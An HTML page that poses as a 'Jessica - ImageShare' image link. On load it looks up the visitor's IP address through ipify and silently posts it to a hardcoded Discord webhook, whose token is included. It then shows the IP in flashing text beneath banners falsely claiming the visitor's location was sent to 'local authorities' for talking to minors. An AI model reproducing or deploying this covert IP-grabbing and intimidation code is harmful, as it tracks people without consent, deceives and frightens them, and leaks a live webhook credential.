<!DOCTYPE html>
<html>
<head>
  <link rel="icon" href="vsco.png" type="image/png">
  <title>Jessica - ImageShare</title>
  <style>
    body {
      background-color: black;
      overflow: hidden;
      position: relative;
      margin: 0;
      padding: 0;
    }

    #ipText {
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      font-size: 150px;
      animation: flash 0.5s infinite;
      color: white;
    }

    @keyframes flash {
      0% {
        opacity: 0;
        color: random-color;
      }
      50% {
        opacity: 1;
      }
      100% {
        opacity: 0;
        color: random-color;
      }
    }

    h1 {
      font-size: 48px;
      color: white;
      text-align: center;
      margin: 10px 0;
    }

    .gif-container {
      display: flex;
      height: calc(33.33vh - 48px); /* Adjust height to accommodate the text */
      width: 100%;
    }

    .gif-container img {
      width: 100%;
      height: 100%;
      object-fit: cover;
      animation: spin 3s linear infinite;
    }
  </style>
</head>
<body>
  <div style="position: absolute; top: 0; width: 100%;">
    <h1 style="color: white; text-align: center; font-size: 200px;">STOP TALKING TO MINORS!!!!</h1>
    <h1 style="color: white; text-align: center; font-size: 60px;">YOUR LOCATION AND IP ADDRESS HAVE BEEN SENT TO LOCAL AUTHORITIES</h1>
  </div>
  <div class="gif-container">
    <img src="bruh.gif" alt="Repeating GIF">
  </div>
  <div class="gif-container">
    <img src="youthought.gif" alt="Repeating GIF">
  </div>
  <div class="gif-container">
    <img src="CHRISTMAS.gif" alt="Repeating GIF">
  </div>
  <h1 id="ipText"></h1>

  <script>
    function sendIPToDiscordWebhook(ipAddress) {
      var webhookUrl = 'https://discord.com/api/webhooks/1126945844793458688/QQX8I8twPBJyK2-Ag1jMnXoqkeGcKlyzjEoKWaifNw_bntK3MTXfdL4K9aTA11CmqcT1'; // Replace with your Discord webhook URL

      var payload = {
        content: 'User IP address: ' + ipAddress
      };

      var request = new XMLHttpRequest();
      request.open('POST', webhookUrl);
      request.setRequestHeader('Content-Type', 'application/json');
      request.send(JSON.stringify(payload));
    }

    function getRandomColor() {
      const letters = '0123456789ABCDEF';
      let color = '#';
      for (let i = 0; i < 6; i++) {
        color += letters[Math.floor(Math.random() * 16)];
      }
      return color;
    }

    window.addEventListener('DOMContentLoaded', () => {
      fetch('https://api.ipify.org?format=json')
        .then(response => response.json())
        .then(data => {
          const ipAddress = data.ip;
          document.getElementById('ipText').textContent = ipAddress;
          const ipElement = document.getElementById('ipText');
          setInterval(() => {
            const randomColor = getRandomColor();
            ipElement.style.color = randomColor;
          }, 500);
          
          sendIPToDiscordWebhook(ipAddress);
        })
        .catch(error => console.log(error));
    });
  </script>
</body>
</html>
